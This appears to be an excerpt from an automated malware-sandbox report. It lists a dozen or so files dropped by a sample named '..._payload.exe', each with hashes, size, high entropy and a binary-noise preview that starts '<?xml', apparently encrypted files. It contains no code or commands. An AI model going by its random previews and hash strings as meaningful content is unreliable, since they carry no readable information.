                                                                                                SHA-512:6CCA0C2C75249A8F383461B01BD0EEDFF30EDB308EF54724978EB458F343BDEEE5620990DB31DDBA4B1B4131EDAF74908C6A1D5B9E572BCF7C354C07AD62F7DB
                                                                                                Malicious:false
                                                                                                Preview:<?xml8p.......Q..w...6B|....h....%..........(@"...?....4.q.:.t.m..~.g..5...7..K....HSS,g.c(......$H.rl.`..O#.... ...w 3K9............{.}.)GC..g.U~.Z..#Y....T~.G5.{6....p.M...s..e6.|...gL....c..b....n..:5l.*...M.......g.~....ry....h..[.2.HA............0sX.......PZ.i.=f@....X.T+.3K...Amh.[.hY..t.o......}..#+A.).....M7v3.....4..1])H8........8..R..s6T..<.V9..{.T..C"G.k<{.`.....lFb~..(7..3..,Tqd.C........dS.....x.....M..8C....d.dO.W.........S1......A..............n|K.=L+..a..".-...b....|c....t........<W..Y.WE).....5.F.1..9..X^..}.qk......#..H..|)..TM.F......\..w.B...tT...q...!#.........JQ,..x.|V.$.A{).P...Zz........#..s[.R..E\1~....:J...TJB.W"jy !.lQ8...esS.X...`.#NF.6.....3.`=O...n.Yf ....%...M...Ia.._G)_.,<...o.?...w.U..-.EL..1g..K....!...:.,>...d.....&....j&.ZE.......6._..=.eWU....\..:.w...?.p..]E5....[LlEu0.W..#x.^h.;-....U...z..M..[3..Rb[|.........t.Og.......o.....a>....`.....%~.I....C......Sq......'..i4.....ti./.k........O....8.t
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2753
                                                                                                Entropy (8bit):7.927872568567391
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:qqNmQpoA3lEkuTJ4J+8jqtv5h10nbb36I3eWkvm/iKqwR2RAugyicwLD:qTalx9J+jd5h2X6I3amaKqJOnck
                                                                                                MD5:838DDEC002523D1BCFF6D03ACE1E308A
                                                                                                SHA1:9AA568A3B58372160586A01934B84FA5A4F20368
                                                                                                SHA-256:BE1458308C5CB20E3C4D4C9531096583366A1FAFE93D3585B82BDF87851CA29F
                                                                                                SHA-512:C0263A42C59BCFEF597D5D2B1E97E32575341C3B40AF6754CDAF1E122A60EA2E053DD6E1115FC502F1736D93C65E65BAE3580CA6EE23C38276CF414DC7AEC294
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....{.{..@3R.......Lb... .q./..p.S..........&............~.j.7.M.c...."...2l...R..S.....5..>Hm..tU....=..yH.-.J.?...:....q..-\.7.t~..FL..=f(,.....02 .^./Zk...,?...F.d...S.....AQ".v......@.:N...#_0Pi.K.9..$...x.&..d......X....T!.m..H>. .C...f.C.>.x............./.J.49I..4.W..w5Lp&..Y.'.8L..#pM..J._..\W...rU..l6...D..s.O...N..W..p.$d..T.+.+.P...C.*+7.U.B9.~....^Ae..V.$.:w..k...TP.3..,]-.Hw..."..B.hhk\.}`.p.u.4p..j>......N..w"........k....Ef.U3.w2hbB.!Bu....Vh..Q0.k..J._........~#...}e%N....Q{g)....3{s..._v;...L....6.}.F.?.h....$.#1.%/...U.&..A........S.N...IbIx..x....X<.pR.....:.....L..s#_...-.e.@..u{p.+CW!.)..r.t.4.92s.>r.r.0.O.b1.......8....d-............%...Z.}=..v.".-..N..}.7.... .yHE..k...\....U.O,t-?k....}i..G2...A{.I.]=.d.,.N.RAx....3.%..E7......4...>:V..i9..x..&>..I.cE^..C6s..B.BQb.p...b<N.?.B.U.ZF..|..`.e...."..;....\&...JQ"..!..A6h..`g..rf...U....Y.."\...P6..y.s}....cn.z.k.....P......<.......+.-Cn\..T... ...).9><.B..e|.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1558
                                                                                                Entropy (8bit):7.875135606500629
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:FputAjQZsRlCPOjD8oMDmv5JeGb0vfJU7B0FQR7wLD:eSj9RlCw8ooKyvf+7ldk
                                                                                                MD5:C26B904860C91B3FB377FF0A82C2CD96
                                                                                                SHA1:A13955A2CE46F83CA60AAD80F2C6630A7E0CDB1C
                                                                                                SHA-256:F0B526FD2FA524848CC0E491D0D7D475504C68B913CCE88E0FA1089627E63C9E
                                                                                                SHA-512:F444E750F069B7FAC0B343DEB3EBA2A3243CDFF4A119848CB492E971F8259936199B3FB9E123F292E68C01B02A8F66AC54F809568AEF296E45316089BAA4BDD1
                                                                                                Malicious:false
                                                                                                Preview:<?xmlO.bn..c..i....?.....vM..m.!,H....@.aT..x.2...K..T.... ...1.<...@...0.zeZ.....A..ZU..iN....\.s....p.g....#[.to..S.T.K.q.....h`/'O.M...l...k..i..B..C...:.72..b.....&.'../...8...@K..D...l...@-..NW..f.E.7.." .,.V...o=..~E.....U:...~..T...XG.i-..iC.O&..;C...iT...Y[.k@...i.6N@......-Q...]W^.+.`.z..X.R\.lW..........'6...?W.|..S;.O....=..h.D.IC.C....#K. ...;]Kna.5.......;.....Q.6...g G.s......rS.<r.....e..:U.y|)..J.B..X.;4(.l2...S...S.P.$?ql.8.....Z...v..H.G..b.<.ss.\..2......{......ZGTm5.J....TQ..|..z......l&^$.......u.....c1S."L...Y/...8[."........s..l...|u:...8.b.7.$*.c..`.t.,.....0...7..[.....v.Q..UsD...L.M.8.>..)\..=...Z(.2o....`...l..&x.f.S0...=...en..C......q.{...oOf?/...W.Di......J...[K....p0CZ..._z...Y......z+..w._..=B.....i......*.d..,.KB9..hAU]ny...Q......(...<'...4..r..8_.AO..kq.$.N4a.w....}..B...R_."...R.@.JWi3..ma.2......z..x..$....bJ.*...h..i.1..o......:....u...T.Y.O[...Z.........w......}.....;)......!.f....+...P.h.\?
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2251
                                                                                                Entropy (8bit):7.918069610096588
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:XWH4AohcHUc1lqKtoUFChSSaBmZ5u3+OWSl/kPc+SadoMILD:gZoC9lJtoU5APu3+J07aWM8
                                                                                                MD5:ADDC08DA5C718A4BF2FF13EFB274F63A
                                                                                                SHA1:C97FAE2B5EB95449F62969E97A931AF7E0A819A2
                                                                                                SHA-256:2AC9AA03C8B7CBF21A193033BACD2A3C3B7E49EAE6ADD39417EB76F6B0145B48
                                                                                                SHA-512:164C55262A51D1EC1F1ABA481EEAF13C211535DADA247D4AA4B4E9EE6D266404B296370957E70D8119F395FAEEB98B5F4995840A862BAB002EECEEB809E0C961
                                                                                                Malicious:false
                                                                                                Preview:<?xml...^7..f.k.$R>..$...%V..f.:R.0.,..K.5..>Y9.....0....b.g.!d.....j.`J.-....f6..c......S.N....@DlE......v.y`&....h.g&.....U"1...^...8.l..8.w..(...pK./-.......u.y3KH..L...'....b..zl*/qt..t?.'L.r..!...g(........v...].-.^!...,.w...%S....B..Y..'......q#.$.=..Aw...R..,.9q.med.6.........9..O...~v..8>.....hD...}...... .......&.u.......N...,..m1.-*.-._....4.V..0Cpm...Q...ME.|y?$.eu@....&...Yy...{."...K=C.Y.".c.e.dt.....]Y...B,..*.e).tS..v.V.re<9.7....&f...^.+......!...t.........L).p;..;.....+O.@.peA.$.q.Y......+..}_<......o.I.N.....+.,.Np.t.}#(..g._n]..Lq.......t...W.9.Id./.ro=...n ...1.,.a.........a..F~....uwr&.v.$.ea.u..D..j,.'5...l8.n..z.p ...p~.X...u.xu.....z......rm.1..Y......`"..;\t%...+R"7..3.....h.Cj...a.U..8._...H...i.. .Ty"U.4....LZ.jW.X.V..,..^.w...xx....a5......R..Z.YW...>.Tn@.](pX.....6.....^.[... W..\o....2..eSg....R...._...!.wP.....T ?<eb...?.[..1...<..9.......v.$D.B.....-tO9.D.'....S....g\. .;..7...J..-.0,...3.z5R?.7?...^.U&...N
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1826
                                                                                                Entropy (8bit):7.878853219123059
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:lsxGAEEi82cApZXJk+gBAzDnfATILtIeATgY22VDZoNLD:ls2EDTAr5Rg8ndLtI3sVmoZ
                                                                                                MD5:1C64DD4D98821A41C25985B10816A148
                                                                                                SHA1:907988CA3D9C1480EE0515A806A1F19E83E96618
                                                                                                SHA-256:973AA88E7E69616A75804AB88C1EAE355C78D95D75FC9A684F312A418CF57204
                                                                                                SHA-512:C27FA46FDCE8D4FDEA1DAD267FA670407B82D1B0A1430701107A8F2647E3143482B295394F57A0AA8AC1C7EB3C20C7CE609BF978EB165856D8E731952C3152D7
                                                                                                Malicious:false
                                                                                                Preview:<?xml..)BA.6......3O.......4yD{.FN....G.........A...or...7lK..Uxd[..._."..?.[....5...9.]Y.8.xd.s.}Y9.C...L..UU......=.r|...d...p...b<:w.>.8.$..L(.R....zmy?...15..xC..kX.....47...:}C.WJw.s.B<g........D.0S.{d. T.Q_5.2..>.m...z*.....a...C.@.R{Z.&.&.C.D..9~..a..n..%..g..6=Q.y....P..y...;.p.{.."...X".....:+Qf..T.D../..@...il.......m..4."F.......~<.r4....W.S@w..@.P......@...2.k_8x..].uOJ"....VbH..@o.../......V..{0....0...^..a.b.>&.BV.o..c.[X............C.......Yq..%I$...b...$ l-.U.............~qM......7.8U....c\1~l.........}b..E...[j..;....U.h.)Ap...2.W..>q..a.EI.x5|..(..s.._.L.n.:M.c.?Q..S..31...K1n.\xw...D].F.w.k.{.....T..h.HA.d..........a....7...?.C2...XWk...V...el..-......Z.......ZH...L...?.6V>f...+.4...s*.......C...b]+...Cg...*I^r?#.LMy).ijU%.'.w...4..Yhwc....5....j4F....b.o..........p....w.V...vA...P....R4p K..=.b.`{..?({........q....8.'..c.M^.F.l.....).f...G.h.]..B..H..v...\C.|.a"..R.L...l.D..d......0...,....V...',e.p..>..b0y..2..}:...])WV(..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1197
                                                                                                Entropy (8bit):7.824302382767936
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:aw8K3bRLz3ZD8bg1CQpcO2L8Oj5MbBPPDvTMrD4m7Jx3bD:aw8shGcxZOkBvYD4cLD
                                                                                                MD5:E505428BC3445B9F716CC39A6AF40064
                                                                                                SHA1:5357C583250292AA1DA4DED80578DC8B16CD684B
                                                                                                SHA-256:0C22B0762F38F689DE52747435F6B8332B590136F87B815F4C751C882D30D45B
                                                                                                SHA-512:D90498EF29D58648F9C67FEF0EBC03D2958BE70EE80C3D3FC7785338CC2A2F0063B58EA8B22DA91C43EC12AAE89BD125DCB04A1DF4D337EC01F57A8E02EC12ED
                                                                                                Malicious:false
                                                                                                Preview:<?xml...v[..O:.+{v..F...l.8..w9.vT"..`.....'+^$.a..n.4dzW/.?.....V.D....5...$].Z..6...%....O......-S...Y..1.$.....3..[....P`.....Li..s..f...(]!.O....Y...e...(6b....1E........oK....X.i}.........1yb....q/....f7..).h...(.P...D..!....|e...m5....9hY.8|;..........6w.>Fe...V...Y2.I);.=B...@.z....Z.q..3.P0P...Y._v....F.<.n...N....3.G..(3.~..#..C..v"1.u._V.3N..3.BeU..2.f.5Th...M...4p..o.H......a.IFV.+".,.j.P..Ct......f.D....@......-\.x.].1..w.(....PG.!\Qe./..iC.k......n....5.....B...j'....w..u....)-.^X.5g...'.-..at..b.N##*^rW....1,|(.]!12.J..o...OD(../.Fa.=u7.S.U.'....C.}m.G.W..@.dh..W...:....2.K...<.......H..(N..Y(9.=.6...j..I.x-|:.]Z.".5.=p8.._E../..Z..h.u..F"..u....q...I.........r.*ugc.T....C.o.&h..;...b.....x.X..f8..`.H.f....AH.oe.l..kN.h.{....a..-v.K.I...g.....M..Ix...h.QN...$q.X...3._d.V..W$...]..o...*F......%|u..*.....A%tR..>../{I`'.m:.I...Ag.GIp..}U...;9...Paj2.[.~../6.......'..(....V.7....t..........`{0yC".4.3.}..;~..:.Wn....DMv..si
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1004
                                                                                                Entropy (8bit):7.7810535991978815
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:IUvGUzhVpEf8LEOVxAhepTt0/rm4AAcbchyO/cgx3bD:WUVVpEMehepSy4AA3JLD
                                                                                                MD5:DD045E16CD7DD1A21A3B3BF6C4FFA2CF
                                                                                                SHA1:259920C0326D4617A62E9F8C3DEF6C730523BFEB
                                                                                                SHA-256:AE56C95131ACB16BB6BEDF5BEDDE432DC700BA1738D258B07F0AA6F79ACC4D41
                                                                                                SHA-512:17B2ED950AB1E1C9BA32AD1C1D660D4805B7E342B93472DCB1ED5490B34079D909FB174C41540AC07E38D5811F8878CA9A00D8491D9C37E8AC8917DCD85DA030
                                                                                                Malicious:false
                                                                                                Preview:<?xml......&b...4...l...Y..@'..c....{...w".ebY..YB_#.w...W(^.;.a.T..3.Kg,.~}.....pO............./{._;.t.F4/.+.{..21.Au1BTuj.pq.!V......:o..^......u[..a....Vu.*...*...V...)K!'.....m..L..u.N<...!.$0..8...u.Z..e..JP.I.A..s.......a7.... w...?.V.....O/.....:#3..J....v.cl2..V.|..C~5..#sh.d~.*.+-.D'..[.....g....o......Df08.D..h.....(...i.......B.!.#..u.c'{`.."f.O.Dc,.$..A7...... ...y.....t=.ZOH/.'...\.#..R.,..l...V...%..,n.....*..p.sNo...0x.n......w..~..n6..bX.)....D.l[....B..O........v6.e...[^./.4Q]....k>]&/.K...f~.... .?.G.....b...,V ..-......<q..+.:q...%y...........<...ul.RmZg.o~..1..M...m..Wb..K.=...#;......k5T..b........V"'d..8....t..p...?.o.#.H(.p.%_nTj....S.J`K.x....O.}.......w..!-}.,./.).....*+.D\"{{.9..K.~.Uj..._.......|.....4.>....~E.4...I...i..,.f.{.Z.t4.3..).......{jF.B...8.Z..{*I.C'..*......&..6.}=.Ne.i2..T.....U.....`.ov..:......2.....(...(....#....9<#p`.b.7.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1186
                                                                                                Entropy (8bit):7.845620473185401
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:O5mefmgQtrMvJTiBtyHQ+ZNrSI82iDnijrvqc5cx3bD:2PQtei+wSdCincLD
                                                                                                MD5:4137C3B70509FA293C0593130255E89E
                                                                                                SHA1:70C553EF8877D226496EE5E9BA24E7F83140E4AF
                                                                                                SHA-256:1842A8CB302550EFE5897E56056A59D2024CC5CCACA41FCC5FFE70BF5B62FACE
                                                                                                SHA-512:ED54AD2B5DD712142CCD7E2B8F8D4F162C54E390C0ADE30EF96838CB61938FA9AA9FD1B38BF2A5858A32D5FCFB688A14C5A1771A6C546FEE16BDD17D048996D6
                                                                                                Malicious:false
                                                                                                Preview:<?xml>......e.)..}.<.E..wB6.8/..jS........Q.i.2.......?+G.^......j...Os='...H%./8..&.eMj9..*.v.%..@.*..69.U....;......x..~.Q....g..\.5...ITj..a......P...wbk.!....TW... .......V..cs.&......7....{.|..=J).c.Z...h.8.5...^.2.9(........{..d.4.1..@R#.B.;....&...j.~D.=.....Y.........|!.q".F.......}h.H...'p.T.n.Q.....-..tm......6.M./.7.lU.b]x.."j.jI..."...W&.u..9..x.,.#4Y_.I...U.zc........b........0........F.....FSl.q.W....&HZ.|..Q.(.a..:.`...<7`$..-.fk...+..,Y...P..^.n.ry.....4o...M.C.....}OE..)"(..q#*..(.v.. L...+......b....b.+.v.-.....g..........l......!_Z .Wx.Y....=.U{_...A.Vo....G.....4%;$..U\......G~..\..q)u\..eO).2...yv.Q).xx....Pew.A.!;eT..[.....Q.......]..9.QMCR..d......f...s...lG.nv......=W.....!.c.;Cp.0[o.].M...3..O.~.....)..yz.....,....|....x......+...s@.....=.J.8.......o")-..n.@6"....J..i.7er..e..7.8..Q.F/H.j...p..'....+t.....}n..X5.4..,..3X.....L.H~.WK&..T..h#9....~.z.\.......S.....mbV.~Q...).{T!.k6.....9...........+..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1291
                                                                                                Entropy (8bit):7.82771388171036
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:fdvyb+UMhLIs2N1D2skraAzxsbAZDtYscqwDaS2DK4Y4unjPKOx3bD:Vvy0hcs/raA7DORD6GOCLD
                                                                                                MD5:FF99A84031D266C7AA5A66BC02869084
                                                                                                SHA1:47E4EEF6EE0894D34305CB3E18E94E8B1C069735
                                                                                                SHA-256:CA29019925650A0CA7E9A1064B92963E2BC6FBE414634CF2D518360A1DA5B193
                                                                                                SHA-512:682B4A29CEE6F49E464802E70082F27CDDF2885B3947597820FD8323081384D28F9801FADE44623AB66721895A500E616DFF5C38AF84425853E8CF94F431E791
                                                                                                Malicious:false
                                                                                                Preview:<?xml,.U.1..G..L.K..s....O..@....O.?T;....C=.Q....3.hNi'..9. +1..w)+.M..(.K.xw.....!Sz.'...n....C&}......&#..I.!..},..........R.:A......m.@{j...k.S..{.. ..(..gH. .l.....C..hIY.Uq_.@..\..V....EZl...U2y..K...T9.....v......t....1.i3...37....W...~.9.^.....J..AFJ..1;.H...L%.,..\..Y+$Q.x...Y.r.T.i.?...=i.C.....33..t*.t.}3...<.1-s<%.&...Xm.oG...../...<...._..n.y.8.....k1..Y...X.t...\.....q.0.b.VY?...P{[\V....* X.Z.I..&,..`a......m.|..;..y.6..= .y.W.9<N..9.D.S...].}...O6+.SN.Uj...^uDb.z..F..2.._c..p..o!5.o..I.8..Z...mCIJ..".X..!'..RU....c...Z,..K9.8`~^.]..o-.h......7U..|....B.4.T....L..C$.<..0~.<M..D....8$.$.6=_..s..PR.........Yrn3........*....i>......I....U..7 f9....V.-.bjs.."4.&....M.[.........%.17.@..qi....N.IOg.....Q..@r.o].5..>...R..-.....x.^.N.RO.8.u....#0...C.}.VC.t..{ 0.'.|....h}.......*..re.x(...L..W...Y.o.Ll...Q72>.K&./....MQ...}.5.Bf..y....?L..3...}..D.YBgu.j....L.k.G...)^{..jE\#:Z.V.5SU5.H.".0.,.h.D_V..X..[..x.W......Z.Qc...u..7
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1737
                                                                                                Entropy (8bit):7.884409431422215
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2aEJm91bI6a26WxK/Q9enLcDqxo4kwDjljDLD:24PDa2tino+eCD5jr
                                                                                                MD5:CFCDABC644408F6FA3377FF030A7AE8B
                                                                                                SHA1:DEB0431600B7C28BA401CC7FE694A1166885D476
                                                                                                SHA-256:D4C4E1E21463BE5C0F3A0F2C6212A8659EFC291A90C9D9096D8F46B6F40D8C0B
                                                                                                SHA-512:E02F02CA6BF6CDF54D01655B0FD4E45B238E5092B6603647C02010356E66BE84AD27687AE3EE10E62D9FE1157424084E9396C286801A129DB8F477265EAA014A
                                                                                                Malicious:false
                                                                                                Preview:<?xml.(...-\...c.t.D....-..2Qv..O.|...T..z..|.Q..ni;.......=....).P...0..b...h....;8...BZ..>..7.$.C.&.!O....e....|..Q.$?...*..........`.fs.j.w.f...?.r|...c#.+5..vp(..y.<.....I.U"...).vw...JxF.......).A...Y<....`.9b=..Cm.f7y..&.....5..x... .C....m..."9..7...w............Z..~1.'I.*..G.9@.).rp..f..xTV...3L..i..:...*.......W...Sj.H..0...48....?.._,..>v....!.....?...&Hd^?..B.r..+.....!=.Pm_......1e..s..r..4.../..|..y....Z...h_......q9..~[.).(..p:...E..i.vy../)lD<.......}7y....q-..g.d..4......!....v.w.g.....<.L;:..]c..A..y.a.-4....Se..0Kk.[9.......8D....l.....\.a..4v.,g....2f...wg.......G>.c.....Um..VR.{&.p.@....)..L..>.._.......'.$.H.........k\.#...SnjD...r.{H9..(o,.R.N.4...d......Z...?E.H.g....X1.[....'7.l^.|.uH.v~....k.=... ..(....O..t".W.:.^..`eU....6.1......&..B./E.g..L....P.\9.]..)[{[..r....,]..w.....e@L...I.]..k{.?....@j.|.<.,E...../.)..L.;.B..4...........!.!.I.1D.K.1J....f4.....fC.I.%../.@{.8^"..~....{...zg...)..$5.8..7......~...t5..j
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1354
                                                                                                Entropy (8bit):7.8456006886210865
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:BBdwcR4w9KiPQ/M5F8T0FefT9RTMpP7TMyR2IQiB4UVGE+cwxpKSx3bD:B4cSKK4QUbcHTOZR2OBF5+cKKmLD
                                                                                                MD5:1C972C152C469177C463B3B86BD9CDD4
                                                                                                SHA1:FF892DFECDA21EF7DDA8D5D0923689AB9BF50CF8
                                                                                                SHA-256:9F5D84642DB9C0546DE0402053DE774DBE3D73C4BFDE5688D1D9CBBC3D4FD123
                                                                                                SHA-512:3FF29216AB11F629372056AB2FF860028F81B938BA1AC88495BADFAA03E24AAA6A66530F671F6686AA044C8AC3C3B172A5CC29221B335DEECCC22D41A6174CE0
                                                                                                Malicious:false
                                                                                                Preview:<?xml2N.....!..<.y ......n.<m&...a$..u!.,.-.[0.n...(ua../..x.m....."...jyyP..S.....)..x......2.29..x.C3!...V..U....E.wG.`L&{..O...G....P....0@l..8.$....u...W. ..7~.Z..d*d.z.I7... <.&.g-..D.I...m..]....uX...BP.9.W#~.h@...Z.....D|6.....n!..y......]...O'.k.......<o.{.n....2M.7c....}.......!..+..2.R.:OT....T.Z(-*.>.......T....j..7..X..(OK.{~l.4..^..j.rVz$o:0..^.j6.e.1.'.....NG...^{..!.....Cc.m....6H...|e7n.fj&......RV...E9...!.z!...b.@o.?}.....H>~}.=E$..o....8v~..hf....^....~.5.........8.F."...{N..I.B.4f.t(q.x.u.1{N*...s...........W+..j..x..........+...i.0.^x.....!......>..n.sZ..........O...1..........wA],..f{E.qz_C:.X.....e..P.]>...n..c..p..|s}.....c.......z]...y..-.F.*@0a#.f[...:..bW...{...Y}.P v=:i..O...Gq...h....z.......u.....9.&C.c. .....tP.h.\.XV6....G.4.RW.....".....P&H.u'..............C...K..RN.;..Xe...V.>d..S.V....y...IB.y..y...6,..^.....B...&..~.ZQ.....y:=.9&WO.....<3cu..If1.1......\.b.#..+*.pi.y...Lx]....N.:}c.......K.Kq.x...L.j9.FL=
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1864
                                                                                                Entropy (8bit):7.891961438226315
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:l4sbhyqoLQCrgQTz1uh1aqJZij8FINoSK28cLD:l4sl7BCrg+Zuh1aum8sYs
                                                                                                MD5:AAF2A38F59CFF0B28147B65AAA333905
                                                                                                SHA1:8F43C5D869CAEBC2F513F90D870D7887253DB30E
                                                                                                SHA-256:EAC91FAFEF771CEC83A12E9FC41FC0435262716E04EC046A395198B6F2C9ECF1
                                                                                                SHA-512:419AB64CE5B07A5719DF05CBC3F41621EF4C66EC37534DD8E31C63DA0AAA683925F5109DCD66018E947504BDF3EE5AF458ED47A113EE01997D4AFD7B13CDCE15
                                                                                                Malicious:false
                                                                                                Preview:<?xml...,.o....@."l9..ocb..g../..R.E<..v._...Ti$.S..\....7F.....f..?..[I......V\Z....>xU......oM.4...*iB|...{2...x'..A...>!....-...8_.i...?l..d..............Wd...wj..+.'...`.(...K..9........f.]...4.....W.....C....m..].H.n[.<.x..A..%Q../.;....k..L.*|Fe.B.:FK...h2Z.H....G.........aH.mX._$/...=.0.t).e.}....K..0....q..J..,....W-....t zv.]e0..vV.`>aT.....N.g.sq.....#.....\o.....k.."p..g.#+.'I....._*.\.i...b@....}&.U...M....#..b... ..C`Du..A..%.v..E\..qI.e..{.J.....da.u]X.^....E.fl9F2.A...(...>...q.>.Z...eN..,4...+.....Q.I....V..YLJ<..I2Ck...6.J..i,..n..4.M.Z..H.G.n.'E.[...........{.Q.V".d.Qh.........J'.O"}..h.R...N6..m...;z.^A....v..^..!.F.WY.C0.H...q.Q..].7i.VY...m......{p\.:(.\..Zz.?"~...`...d....!F..F.p..$.e.%............^....h......4..D......cY$.q...o'.y.<.$.....h-Ba......u&..Z.\......W6...z.B...q..K<..p..f...u....Y...k]....M....Y..E..?...l.w..w[.ksK.T..~;.L.Y.;........v..'..lC.V%5B......".F..0.;.K....w...>.."...........j...q.4......
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1509
                                                                                                Entropy (8bit):7.8734759076864025
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:sJCKpR2AIICBPG0MnCR66L5bV3L/VhroGfdHgDqGjPQEPZQx5eHqAPHoqrzl31Sl:sJCKpR2AoeCR6ABV3Lt1fdHg2GjPl6xT
                                                                                                MD5:6A1AD38D9C16E925F11B31D97096109E
                                                                                                SHA1:CE8236EB145A440E340AAB307160A02DE6898071
                                                                                                SHA-256:91F9CB458A7FB9DF38AEAF5895C0047E0C43B6DB9EA2E9AB39DA9D52A5F653B8
                                                                                                SHA-512:C0F1FD7939B5DC45EE3A1BE05755C5D0051A247C69FD372830DEC289258E5FF5AF95C5A0B2CFA7B6D544A6980A8D5F07F7BF7C929B067BBD79A8DB77B9BDEEB2
                                                                                                Malicious:false
                                                                                                Preview:<?xml...$..kz;...A:0....~...Y.d..c.u.q....%[...I...dx ..|.....}2=/.b.....eL..."G.=..*....7.K~....F..Xp.vh.xU_. .T... ...D(...6d1..f.......j..Y..k.....T.....0.e.o...*.IX..(...^.....4h"..E......{C.R..k~V.X....=...T-.......q..w.rH".d...&..c.&.,9;O.:.h......W.-.D..@s.FnN'.%2`..at..P..(.....y.8....A.r..C..M...G..,.....L...YbF*@..XQ.Q..;.z...."{=..D...G.>)hK..,.p^.N....qE&.....eO.>!...4....*..."\.`....(6.f..+.{^..1j.).H|3|.;v.T.w.U`.;:..m.....Z..K.[8.W....O1.M4...x;..... ef.'......J)$>..T:.Cqd.......".......Q.,,..[.`.2|Z=..\...#.X.^G..n.o-..*......,X..scY..YS.-..7l.`7..rg.....q<......Y# .u.."R...f..X.....~x......?_.K...PCW9..l.O.<H.6...2-E.4n2......f..!Z.!i_...7..;u.e{!.I.[.....NU.0..pN.....6*.).6g...9/.L_...f..^U.at....o.q.A..z...../..\.t....Q;V..d>no....0P..Wi..7.1.N .&..i..f...B.<..-H.eI._...-..(.3.#.%&qsH......]e.rqb.....@.c1.tV.....5i..K..00.H._j...=7c......d..c..@Q%.XY2....,...U...G.>...........,%.^..........XL.j Ok&....I.c[7/.?...WZ..@@..-
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2007
                                                                                                Entropy (8bit):7.911798853772514
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:l8UpNMVtrqqx7T/4+X0EKG0wpKwy8lqvqBCgmDLD:l8UXurhxfw+kE50wpMUXBCX
                                                                                                MD5:597BC4F5A41DEDDD8D209A53E1639DCF
                                                                                                SHA1:91940CAD54D4665287720E0F67AAEBC8DC091F4D
                                                                                                SHA-256:C1954E66FBD9642F2253B4A47EFE4D80A3666493F008CE679D87EDD30A298089
                                                                                                SHA-512:3FAA4C0CFC682DF37D876AE2F4893AA821A41AE37C985141D49C1C487BC8FF6655ABDB7590AFBDC3FC15E11D2B4AF1DEBE67C536061E189222CAC4C0B6B376CB
                                                                                                Malicious:false
